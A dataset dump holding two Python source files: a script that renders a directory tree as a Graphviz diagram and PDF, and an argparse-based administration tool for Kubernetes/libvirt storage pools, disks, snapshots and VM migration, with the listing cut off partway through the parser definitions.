metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "73VW/TechnicalReport",
"score": 3
} |
#### File: TechnicalReport/foldertree/folder_tree.py
```python
import os
import sys
import pygraphviz as pgv
from nodes import Node
from PIL import ImageFont
EXCLUDE = ['.git', '__pycache__']
SHARED_ATTRIBUTES = ", style=filled, colorscheme=ylgnbu"
GRAPHVIZ_DPI = 60.
FONT_SIZE = 14
class FileNode(Node):
"""FileNode class."""
type = 'File'
attributes = "[shape=note" + SHARED_ATTRIBUTES
def __init__(self, color_scheme, *args, **kwargs):
"""Init Node."""
self.attributes += str(color_scheme)
super().__init__(*args, **kwargs)
class DirectoryNode(Node):
"""DirectoryNode class."""
type = 'Directory'
attributes = "[shape=folder" + SHARED_ATTRIBUTES
default_icon = "file-directory"
def __init__(self, color_scheme, *args, **kwargs):
"""Init Node."""
self.children = []
self.file_children = []
self.directory_children = []
self.attributes += str(color_scheme)
super().__init__(*args, **kwargs)
def add(self, node):
"""Add node to tree."""
if isinstance(node, FileNode):
self.file_children.append(node)
elif isinstance(node, DirectoryNode):
self.directory_children.append(node)
self.children = self.file_children + self.directory_children
node.parent(self)
class EmptyNode(Node):
"""EmptyNode."""
type = 'Empty'
attributes = "[shape=\"point\", width=0, height=0]"
def __init__(self, *args, **kwargs):
"""Init Node."""
self.children = ""
super().__init__(*args, **kwargs)
def add(self, node):
"""Add node to tree."""
self.children = node
node.parent(self)
def print_for_graphviz(self):
"""Represent node for graphviz layout."""
representation = "\t" + self.id() + " "
representation += self.attributes + "\n"
return representation
def write_to_file(filename, content, mode='a'):
"""Write content to file."""
with open(filename, mode) as f:
f.write(content)
def open_graph(filename):
"""Open graphviz graph."""
graph = "strict digraph projetcStructure { \n"
graph += "\tgraph [overlap=false, splines=ortho, ranksep=0.05]\n"
graph += "\tedge[arrowhead=none, color=black]\n"
graph += f'\tnode[fontname=\"DejaVu Sans Mono\", fontsize={FONT_SIZE}]\n'
write_to_file(filename, graph, 'w')
def close_graph(filename):
"""Close graph."""
write_to_file(filename, "\n}")
def print_tree(root):
"""Print folder tree."""
nodes = ""
invisible_edges = ""
edges = ""
temp_nodes = ""
temp_edges = ""
nodes += root.print_for_graphviz()
curr_invisible = root
try:
rank_visible = "\t{rank=same; "
rank_invisible = rank_visible
for child in root.children:
(t_nodes, t_edges) = print_tree(child)
temp_nodes += t_nodes
temp_edges += t_edges
nodes += child.print_for_graphviz()
empty = EmptyNode("empty" + child.name, child.depth)
nodes += empty.print_for_graphviz()
invisible_edges += curr_invisible.id() + " -> " + empty.id() + "\n"
edges += empty.id() + " -> " + child.id() + "\n"
rank_invisible += " " + empty.id()
rank_visible += " " + child.id()
curr_invisible = empty
if len(root.children) is 0:
rank_visible = ""
rank_invisible = ""
else:
rank_visible += "}\n"
rank_invisible += "}\n"
nodes += temp_nodes
edges = rank_invisible + invisible_edges + rank_visible + edges
edges += temp_edges
except AttributeError:
pass
return (nodes, edges)
def walk_dir(root, depth, color_scheme):
"""Explore directory and build graph until depth."""
directory = root.complete_path
content = os.listdir(directory)
node = None
font = ImageFont.truetype('DejaVuSansMono.ttf', FONT_SIZE)
width = 0
if depth > 0:
for c in content:
if c not in EXCLUDE:
fname = directory + c
if os.path.isfile(fname):
node = FileNode(color_scheme,
c,
depth,
complete_path=fname)
else:
node = DirectoryNode(
color_scheme, c, depth, complete_path=fname)
node = walk_dir(node, depth - 1, color_scheme)
root.add(node)
width = max(width, font.getsize(node.name)[0])
root.children_width = width / GRAPHVIZ_DPI + ((1 / 72) * 20 * 2)
return root
def build_tree(output, td_name, target_dir, depth):
"""Build tree from target_dir and write it to output file."""
if depth < 3:
color_scheme = 3
else:
color_scheme = depth + 1
try:
print('Building tree...')
output += '.dot'
open_graph(output)
root = DirectoryNode(color_scheme, td_name, depth +
1, complete_path=target_dir)
root = walk_dir(root, depth, color_scheme)
(nodes, edges) = print_tree(root)
write_to_file(output, nodes + edges)
close_graph(output)
except FileNotFoundError as e:
exit(f'Error:\t{e.strerror}: {output}\nExiting...')
def main(target_dir=".", depth=2):
"""Catch main function."""
print(target_dir)
if target_dir == ".":
td_name = os.getcwd().split(
"/")[-1]
elif target_dir == "..":
td_name = os.getcwd().split(
"/")[-2]
else:
td_name = target_dir
directory = 'generated/'
if not os.path.exists(directory):
os.makedirs(directory)
output = directory + 'folder-tree-for-' + \
td_name.replace("/", "-")
while os.path.isfile(f'{output}.dot'):
output += "0"
build_tree(output, td_name, target_dir, depth)
print(f'Wrote folder tree as [{output}.dot]\nComputing pdf...')
g = pgv.AGraph(f'{output}.dot')
g.draw(f'{output}.pdf', prog="dot", args='-Grankdir=LR')
print(f'Wrote pdf as [{output}.pdf]')
if __name__ == "__main__":
if len(sys.argv) < 2:
exit("Il est nécessaire de spécifier sur \
quel répertoire effectuer la recherche")
target_dir = str(sys.argv[1])
depth = int(sys.argv[2]) if len(sys.argv) > 2 else 2
main(target_dir, depth)
``` |
{
"source": "742362144/kubeext-SDS-python3",
"score": 2
} |
#### File: 742362144/kubeext-SDS-python3/kubesds-adm.py
```python
import argparse
from operation import *
from utils import logger
from utils.exception import ConditionException
LOG = "/var/log/kubesds3.log"
logger = logger.set_logger(os.path.basename(__file__), LOG)
SUPPORT_STORAGE_TYPE = ["localfs", "nfs", "glusterfs"]
# os.putenv('LANG', 'en_US.UTF-8')
def execute(f_name, params):
moudle = __import__('operation')
func = getattr(moudle, f_name)
try:
check(f_name, params)
func(params)
except ExecuteException as e:
logger.debug(f_name)
logger.debug(params)
logger.debug(traceback.format_exc())
error_print(400, "error occur while %s. %s" % (f_name, e.message))
except Exception:
logger.debug(f_name)
logger.debug(params)
logger.debug(traceback.format_exc())
error_print(300, "error occur while %s. traceback: %s" % (f_name, traceback.format_exc()))
def check(f_name, args):
check_storage_type(args)
check_pool(f_name, args)
def check_storage_type(args):
if hasattr(args, 'type') and args.type not in SUPPORT_STORAGE_TYPE:
error_print(100, "unsupported value type: %s" % args.type)
# check pool type, if pool type not match, stop delete pool
def check_pool_type(args):
try:
if not hasattr(args, 'type'):
return
if not hasattr(args, 'pool'):
return
if args is None:
return
pool_info = get_pool_info_from_k8s(args.pool)
if pool_info is None:
error_print(202, "check_pool_type, cannot get pool info from k8s.")
if pool_info['pooltype'] == args.type:
return
else:
error_print(221, "check_pool_type, pool type is not match. given is %s, actual is %s" % (
args.type, pool_info['pooltype']))
except ExecuteException:
logger.debug(traceback.format_exc())
error_print(202, "check_pool_type, cannot get pool info from k8s.")
def check_pool(f_name, args):
try:
if f_name == 'cloneDisk':
return
if not hasattr(args, 'type'):
return
if not hasattr(args, 'pool'):
return
if f_name == 'createPool':
if is_pool_exists(args.uuid):
raise ConditionException(201, "virsh pool %s has exist" % args.uuid)
else:
if f_name == 'deletePool':
# if pool is not create successful, delete it from k8s.
helper = K8sHelper("VirtualMachinePool")
pool_info = helper.get_data(args.pool, "pool")
if pool_info is None:
helper.delete(args.pool)
success_print("delete pool %s successful." % args.pool, {})
check_pool_type(args)
pool_info = get_pool_info_from_k8s(args.pool)
pool = pool_info['poolname']
if not is_pool_exists(pool):
raise ConditionException(203, "virsh pool %s not exist" % pool)
except ExecuteException as e1:
logger.debug(traceback.format_exc())
error_print(202, "check_pool, cannot get pool info. %s" % e1.message)
except ConditionException as e2:
logger.debug(traceback.format_exc())
error_print(e2.code, e2.msg)
def is_virsh_disk_exist(pool, diskname):
pool_info = get_pool_info(pool)
if os.path.isdir('%s/%s' % (pool_info['path'], diskname)):
return True
return False
def check_virsh_disk_exist(pool, diskname):
pool_info = get_pool_info(pool)
if os.path.isdir('%s/%s' % (pool_info['path'], diskname)):
error_print(207, "virsh disk %s is in pool %s" % (diskname, pool))
def check_virsh_disk_not_exist(pool, diskname):
pool_info = get_pool_info(pool)
if not os.path.isdir('%s/%s' % (pool_info['path'], diskname)):
error_print(209, "virsh disk %s is not in pool %s" % (diskname, pool))
def check_virsh_disk_snapshot_exist(pool, diskname, snapshot):
pool_info = get_pool_info(pool)
if os.path.exists('%s/%s/snapshots/%s' % (pool_info['path'], diskname, snapshot)):
error_print(209, "virsh disk snapshot %s is in volume %s" % (snapshot, diskname))
def check_virsh_disk_snapshot_not_exist(pool, diskname, snapshot):
pool_info = get_pool_info(pool)
if not os.path.exists('%s/%s/snapshots/%s' % (pool_info['path'], diskname, snapshot)):
error_print(209, "virsh disk snapshot %s is not in volume %s" % (snapshot, diskname))
def check_virsh_disk_size(pool, vol, size):
if get_volume_size(pool, vol) >= int(size):
error_print(213, "new disk size must larger than the old size.")
def createPoolParser(args):
if args.content is None:
error_print(100, "less arg, content must be set")
if args.content not in ["vmd", "vmdi", "iso"]:
error_print(100, "less arg, content just can be vmd, vmdi, iso")
execute('createPool', args)
def deletePoolParser(args):
execute('deletePool', args)
def startPoolParser(args):
execute('startPool', args)
def autoStartPoolParser(args):
execute('autoStartPool', args)
def stopPoolParser(args):
execute('stopPool', args)
def showPoolParser(args):
execute('showPool', args)
def createDiskParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
pool = pool_info['poolname']
if args.format is None:
error_print(100, "less arg, format must be set")
check_virsh_disk_exist(pool, args.vol)
check_pool_active(pool_info)
execute('createDisk', args)
def deleteDiskParser(args):
try:
helper = K8sHelper("VirtualMachineDisk")
disk_info = helper.get_data(args.vol, "volume")
if disk_info is None:
helper.delete(args.vol)
success_print("delete disk %s successful." % args.vol, {})
except ExecuteException as e:
error_print(400, e.message)
pool_info = get_pool_info_from_k8s(args.pool)
pool = pool_info['poolname']
check_pool_active(pool_info)
check_virsh_disk_not_exist(pool, args.vol)
execute('deleteDisk', args)
def resizeDiskParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
pool = pool_info['poolname']
check_pool_active(pool_info)
check_virsh_disk_not_exist(pool, args.vol)
check_virsh_disk_size(pool, args.vol, args.capacity)
execute('resizeDisk', args)
def cloneDiskParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
# pool = pool_info['poolname']
try:
disk_info = get_vol_info_from_k8s(args.newname)
error_print(500, "vol %s has exist in k8s." % args.newname)
except ExecuteException:
pass
check_pool_active(pool_info)
# check_virsh_disk_not_exist(pool, args.vol)
# check_virsh_disk_exist(pool, args.newname)
execute('cloneDisk', args)
def registerDiskToK8sParser(args):
execute('registerDiskToK8s', args)
def rebaseDiskSnapshotParser(args):
execute('rebaseDiskSnapshot', args)
def showDiskParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
pool = pool_info['poolname']
check_virsh_disk_not_exist(pool, args.vol)
execute('showDisk', args)
def prepareDiskParser(args):
execute('prepareDisk', args)
def releaseDiskParser(args):
execute('releaseDisk', args)
def showDiskSnapshotParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
pool = pool_info['poolname']
check_virsh_disk_snapshot_not_exist(pool, args.vol, args.name)
execute('showDiskSnapshot', args)
def createExternalSnapshotParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
pool = pool_info['poolname']
if args.format is None:
error_print(100, "less arg, format must be set")
check_virsh_disk_snapshot_exist(pool, args.vol, args.name)
disk_dir = '%s/%s' % (get_pool_info(pool)['path'], args.vol)
config_path = '%s/config.json' % disk_dir
with open(config_path, "r") as f:
config = load(f)
if not os.path.isfile(config['current']):
error_print(100, "can not find vol current %s." % config['current'])
if os.path.isfile('%s/snapshots/%s' % (disk_dir, args.name)):
error_print(100, "snapshot file has exist")
execute('createExternalSnapshot', args)
def revertExternalSnapshotParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
pool = pool_info['poolname']
if args.format is None:
error_print(100, "less arg, format must be set")
check_virsh_disk_snapshot_not_exist(pool, args.vol, args.name)
disk_dir = '%s/%s' % (get_pool_info(pool)['path'], args.vol)
config_path = '%s/config.json' % disk_dir
with open(config_path, "r") as f:
config = load(f)
if not os.path.isfile(config['current']):
error_print(100, "can not find current file")
execute('revertExternalSnapshot', args)
def deleteExternalSnapshotParser(args):
try:
helper = K8sHelper("VirtualMachineDiskSnapshot")
ss_info = helper.get_data(args.name, "volume")
if ss_info is None:
helper.delete(args.name)
success_print("delete snapshot %s successful." % args.name, {})
except ExecuteException as e:
error_print(400, e.message)
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
pool = pool_info['poolname']
check_virsh_disk_snapshot_not_exist(pool, args.vol, args.name)
disk_dir = '%s/%s' % (get_pool_info(pool)['path'], args.vol)
ss_path = '%s/snapshots/%s' % (disk_dir, args.name)
if not os.path.isfile(ss_path):
error_print(100, "snapshot file not exist")
execute('deleteExternalSnapshot', args)
def updateDiskCurrentParser(args):
for current in args.current:
if not os.path.isfile(current):
error_print(100, "disk current path %s not exists!" % current)
execute('updateDiskCurrent', args)
def customizeParser(args):
execute('customize', args)
def createDiskFromImageParser(args):
pool_info = get_pool_info_from_k8s(args.targetPool)
check_pool_active(pool_info)
pool = pool_info['poolname']
check_pool_active(pool_info)
execute('createDiskFromImage', args)
def migrateParser(args):
if not re.match('^((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}$', args.ip):
error_print(100, "ip is not right")
execute('migrate', args)
def migrateDiskParser(args):
execute('migrateDisk', args)
def migrateVMDiskParser(args):
execute('migrateVMDisk', args)
def changeDiskPoolParser(args):
execute('changeDiskPool', args)
def modifyVMParser(args):
execute('modifyVM', args)
def exportVMParser(args):
try:
execute('exportVM', args)
vm_heler = K8sHelper('VirtualMachine')
vm_heler.delete_lifecycle(args.domain)
except Exception as e:
raise e
def backupVMParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
try:
execute('backupVM', args)
vm_heler = K8sHelper('VirtualMachine')
vm_heler.delete_lifecycle(args.domain)
except Exception as e:
raise e
def restoreVMParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
if args.target:
pool_info = get_pool_info_from_k8s(args.target)
check_pool_active(pool_info)
execute('restoreVM', args)
def backupDiskParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
execute('backupDisk', args)
def restoreDiskParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
if args.target:
pool_info = get_pool_info_from_k8s(args.target)
check_pool_active(pool_info)
execute('restoreDisk', args)
def showDiskPoolParser(args):
execute('showDiskPool', args)
def deleteVMBackupParser(args):
execute('deleteVMBackup', args)
def deleteVMDiskBackupParser(args):
execute('deleteVMDiskBackup', args)
def deleteRemoteBackupParser(args):
execute('deleteRemoteBackup', args)
def pullRemoteBackupParser(args):
execute('pullRemoteBackup', args)
def pushBackupParser(args):
# if args.vol:
# execute('pushVMDiskBackup', args)
# else:
# execute('pushVMBackup', args)
execute('pushVMBackup', args)
def createCloudInitUserDataImageParser(args):
execute('createCloudInitUserDataImage', args)
def deleteCloudInitUserDataImageParser(args):
execute('deleteCloudInitUserDataImage', args)
def updateOSParser(args):
execute('updateOS', args)
def cleanBackupParser(args):
execute('cleanBackup', args)
def cleanRemoteBackupParser(args):
execute('cleanRemoteBackup', args)
def scanBackupParser(args):
execute('scanBackup', args)
def deleteRemoteBackupServerParser(args):
execute('deleteRemoteBackupServer', args)
# --------------------------- cmd line parser ---------------------------------------
parser = argparse.ArgumentParser(prog="kubesds-adm", description="All storage adaptation tools")
subparsers = parser.add_subparsers(help="sub-command help")
# -------------------- add createPool cmd ----------------------------------
parser_create_pool = subparsers.add_parser("createPool", help="createPool help")
parser_create_pool.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_create_pool.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool name to delete")
# localfs, nfs and glusterfs only, target will transfer to path in nfs and glusterfs
parser_create_pool.add_argument("--url", required=True, metavar="[URL]", type=str,
help="storage pool create location")
# set autostart
parser_create_pool.add_argument("--autostart", metavar="[AUTOSTART]", type=bool, nargs='?', const=True,
help="if autostart, pool will set autostart yes after create pool")
# set content
parser_create_pool.add_argument("--content", metavar="[CONTENT]", type=str,
help="pool content")
# nfs only
parser_create_pool.add_argument("--opt", metavar="[OPT]", type=str,
help="nfs require or nfs mount options")
# nfs and glusterfs only
parser_create_pool.add_argument("--uuid", metavar="[UUID]", type=str,
help="nfs or glusterfs poolname ")
# set default func
parser_create_pool.set_defaults(func=createPoolParser)
# -------------------- add deletePool cmd ----------------------------------
parser_delete_pool = subparsers.add_parser("deletePool", help="deletePool help")
parser_delete_pool.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_delete_pool.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool name to delete")
# set default func
parser_delete_pool.set_defaults(func=deletePoolParser)
# -------------------- add startPool cmd ----------------------------------
parser_start_pool = subparsers.add_parser("startPool", help="startPool help")
parser_start_pool.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_start_pool.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool name to delete")
# set default func
parser_start_pool.set_defaults(func=startPoolParser)
# -------------------- add autoStartPool cmd ----------------------------------
parser_autostart_pool = subparsers.add_parser("autoStartPool", help="autoStartPool help")
parser_autostart_pool.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_autostart_pool.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool name to autostart")
parser_autostart_pool.add_argument("--disable", metavar="[DISABLE]", type=bool, nargs='?', const=True,
help="disable autostart")
# set default func
parser_autostart_pool.set_defaults(func=autoStartPoolParser)
# -------------------- add stopPool cmd ----------------------------------
parser_stop_pool = subparsers.add_parser("stopPool", help="stopPool help")
parser_stop_pool.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_stop_pool.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool name to stop")
# set default func
parser_stop_pool.set_defaults(func=stopPoolParser)
# -------------------- add showPool cmd ----------------------------------
parser_show_pool = subparsers.add_parser("showPool", help="showPool help")
parser_show_pool.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_show_pool.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool name to show")
# set default func
parser_show_pool.set_defaults(func=showPoolParser)
# -------------------- add createDisk cmd ----------------------------------
parser_create_disk = subparsers.add_parser("createDisk", help="createDisk help")
parser_create_disk.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="disk type to use")
parser_create_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_create_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
# will transfer to --size when type in nfs or glusterfs
parser_create_disk.add_argument("--capacity", required=True, metavar="[CAPACITY]", type=str,
help="capacity is the size of the volume to be created, as a scaled integer (see NOTES above), defaulting to bytes")
parser_create_disk.add_argument("--format", metavar="[raw|bochs|qcow|qcow2|vmdk|qed]", type=str,
help="format is used in file based storage pools to specify the volume file format to use; raw, bochs, qcow, qcow2, vmdk, qed.")
# set default func
parser_create_disk.set_defaults(func=createDiskParser)
# -------------------- add deleteDisk cmd ----------------------------------
parser_delete_disk = subparsers.add_parser("deleteDisk", help="deleteDisk help")
parser_delete_disk.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_delete_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_delete_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
# set default func
parser_delete_disk.set_defaults(func=deleteDiskParser)
# -------------------- add resizeDisk cmd ----------------------------------
parser_resize_disk = subparsers.add_parser("resizeDisk", help="resizeDisk help")
parser_resize_disk.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_resize_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_resize_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
parser_resize_disk.add_argument("--capacity", required=True, metavar="[CAPACITY]", type=str,
help="new volume capacity to use")
parser_resize_disk.add_argument("--vmname", metavar="[VMNAME]", type=str,
help="new volume capacity to use")
# set default func
parser_resize_disk.set_defaults(func=resizeDiskParser)
# -------------------- add cloneDisk cmd ----------------------------------
parser_clone_disk = subparsers.add_parser("cloneDisk", help="cloneDisk help")
parser_clone_disk.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_clone_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_clone_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
parser_clone_disk.add_argument("--newname", required=True, metavar="[NEWNAME]", type=str,
help="new volume name to use")
parser_clone_disk.add_argument("--format", required=True, metavar="[FORMAT]", type=str,
help="format to use")
# set default func
parser_clone_disk.set_defaults(func=cloneDiskParser)
# -------------------- add registerDiskToK8s cmd ----------------------------------
parser_register_disk = subparsers.add_parser("registerDiskToK8s", help="register disk to k8s help")
parser_register_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_register_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
# set default func
parser_register_disk.set_defaults(func=registerDiskToK8sParser)
# -------------------- add rebaseDiskSnapshot cmd ----------------------------------
parser_rebase_snapshot = subparsers.add_parser("rebaseDiskSnapshot", help="rebase disk snapshot help")
parser_rebase_snapshot.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_rebase_snapshot.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
# set default func
parser_rebase_snapshot.set_defaults(func=rebaseDiskSnapshotParser)
# -------------------- add prepareDisk cmd ----------------------------------
parser_prepare_disk = subparsers.add_parser("prepareDisk", help="prepareDisk help")
parser_prepare_disk.add_argument("--domain", metavar="[DOMAIN]", type=str,
help="storage pool to use")
parser_prepare_disk.add_argument("--vol", metavar="[VOL]", type=str,
help="volume name to use")
parser_prepare_disk.add_argument("--path", metavar="[PATH]", type=str,
help="volume uni to use")
# set default func
parser_prepare_disk.set_defaults(func=prepareDiskParser)
# -------------------- add releaseDisk cmd ----------------------------------
parser_release_disk = subparsers.add_parser("releaseDisk", help="releaseDisk help")
parser_release_disk.add_argument("--domain", metavar="[DOMAIN]", type=str,
help="domain to use")
parser_release_disk.add_argument("--vol", metavar="[VOL]", type=str,
help="volume name to use")
parser_release_disk.add_argument("--path", metavar="[PATH]", type=str,
help="volume path to use")
# set default func
parser_release_disk.set_defaults(func=releaseDiskParser)
# -------------------- add showDisk cmd ----------------------------------
parser_show_disk = subparsers.add_parser("showDisk", help="showDisk help")
parser_show_disk.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_show_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_show_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
# set default func
parser_show_disk.set_defaults(func=showDiskParser)
# -------------------- add showDiskSnapshot cmd ----------------------------------
parser_show_disk_snapshot = subparsers.add_parser("showDiskSnapshot", help="showDiskSnapshot help")
parser_show_disk_snapshot.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_show_disk_snapshot.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_show_disk_snapshot.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
parser_show_disk_snapshot.add_argument("--name", required=True, metavar="[NAME]", type=str,
help="volume snapshot name")
# set default func
parser_show_disk_snapshot.set_defaults(func=showDiskSnapshotParser)
# -------------------- add createExternalSnapshot cmd ----------------------------------
parser_create_ess = subparsers.add_parser("createExternalSnapshot", help="createExternalSnapshot help")
parser_create_ess.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_create_ess.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_create_ess.add_argument("--name", required=True, metavar="[NAME]", type=str,
help="volume snapshot name to use")
parser_create_ess.add_argument("--format", required=True, metavar="[FORMAT]", type=str,
help="disk format to use")
parser_create_ess.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="disk current file to use")
parser_create_ess.add_argument("--domain", metavar="[domain]", type=str,
help="domain")
# set default func
parser_create_ess.set_defaults(func=createExternalSnapshotParser)
# -------------------- add revertExternalSnapshot cmd ----------------------------------
parser_revert_ess = subparsers.add_parser("revertExternalSnapshot", help="revertExternalSnapshot help")
parser_revert_ess.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_revert_ess.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_revert_ess.add_argument("--name", required=True, metavar="[NAME]", type=str,
help="volume snapshot name to use")
parser_revert_ess.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="disk current file to use")
parser_revert_ess.add_argument("--format", required=True, metavar="[FORMAT]", type=str,
help="disk format to use")
parser_revert_ess.add_argument("--domain", metavar="[domain]", type=str,
help="domain")
# set default func
parser_revert_ess.set_defaults(func=revertExternalSnapshotParser)
# -------------------- add deleteExternalSnapshot cmd ----------------------------------
parser_delete_ess = subparsers.add_parser("deleteExternalSnapshot", help="deleteExternalSnapshot help")
parser_delete_ess.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_delete_ess.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_delete_ess.add_argument("--name", required=True, metavar="[NAME]", type=str,
help="volume snapshot name to use")
parser_delete_ess.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="disk current file to use")
parser_delete_ess.add_argument("--domain", metavar="[domain]", type=str,
help="domain")
# set default func
parser_delete_ess.set_defaults(func=deleteExternalSnapshotParser)
# -------------------- add updateDiskCurrent cmd ----------------------------------
parser_upodate_current = subparsers.add_parser("updateDiskCurrent", help="updateDiskCurrent help")
parser_upodate_current.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_upodate_current.add_argument("--current", required=True, metavar="[CURRENT]", type=str, nargs='*',
help="disk current file to use")
# set default func
parser_upodate_current.set_defaults(func=updateDiskCurrentParser)
# -------------------- add customize cmd ----------------------------------
parser_customize = subparsers.add_parser("customize", help="customize help")
parser_customize.add_argument("--add", required=True, metavar="[ADD]", type=str,
help="storage pool type to use")
parser_customize.add_argument("--user", required=False, metavar="[USER]", type=str,
help="disk current file to use")
parser_customize.add_argument("--password", required=False, metavar="[PASSWORD]", type=str,
help="disk current file to use")
parser_customize.add_argument("--ssh_inject", required=False, metavar="[SSH_INJECT]", type=str,
help="disk ssh-inject")
# set default func
parser_customize.set_defaults(func=customizeParser)
# -------------------- add createDiskFromImage cmd ----------------------------------
parser_create_disk_from_image = subparsers.add_parser("createDiskFromImage", help="createDiskFromImage help")
parser_create_disk_from_image.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_create_disk_from_image.add_argument("--name", required=True, metavar="[name]", type=str,
help="new disk name to use")
parser_create_disk_from_image.add_argument("--targetPool", required=True, metavar="[targetPool]", type=str,
help="storage pool to use")
parser_create_disk_from_image.add_argument("--source", required=True, metavar="[source]", type=str,
help="disk source to use")
parser_create_disk_from_image.add_argument("--full_copy", metavar="[full_copy]", type=bool, nargs='?', const=True,
help="if full_copy, new disk will be created by snapshot")
# set default func
parser_create_disk_from_image.set_defaults(func=createDiskFromImageParser)
# -------------------- add migrate cmd ----------------------------------
parser_migrate = subparsers.add_parser("migrate", help="migrate help")
parser_migrate.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to migrate")
parser_migrate.add_argument("--ip", required=True, metavar="[IP]", type=str,
help="storage pool type to use")
parser_migrate.add_argument("--offline", metavar="[OFFLINE]", type=bool, nargs='?', const=True,
help="support migrate offline")
# set default func
parser_migrate.set_defaults(func=migrateParser)
# -------------------- add migrateDisk cmd ----------------------------------
parser_migrate_disk = subparsers.add_parser("migrateDisk", help="migrate disk help")
parser_migrate_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="vol to migrate")
parser_migrate_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="target storage pool to use")
# set default func
parser_migrate_disk.set_defaults(func=migrateDiskParser)
# -------------------- add migrateVMDisk cmd ----------------------------------
parser_migrate_vm_disk = subparsers.add_parser("migrateVMDisk", help="migrateVMDisk help")
parser_migrate_vm_disk.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to migrate")
parser_migrate_vm_disk.add_argument("--ip", required=True, metavar="[IP]", type=str,
help="storage pool type to use")
parser_migrate_vm_disk.add_argument("--migratedisks", required=True, metavar="[MIGRATEDISKS]", type=str,
help="vol opt to migrate")
# parser_migrate_vm_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
# help="target storage pool to use")
# set default func
parser_migrate_vm_disk.set_defaults(func=migrateVMDiskParser)
# -------------------- add restoreDisk cmd ----------------------------------
parser_change_disk_pool = subparsers.add_parser("changeDiskPool", help="changeDiskPool help")
parser_change_disk_pool.add_argument("--xml", required=True, metavar="[XML]", type=str,
help="vm disk to backup")
# set default func
parser_change_disk_pool.set_defaults(func=changeDiskPoolParser)
# -------------------- add migrateVMDisk cmd ----------------------------------
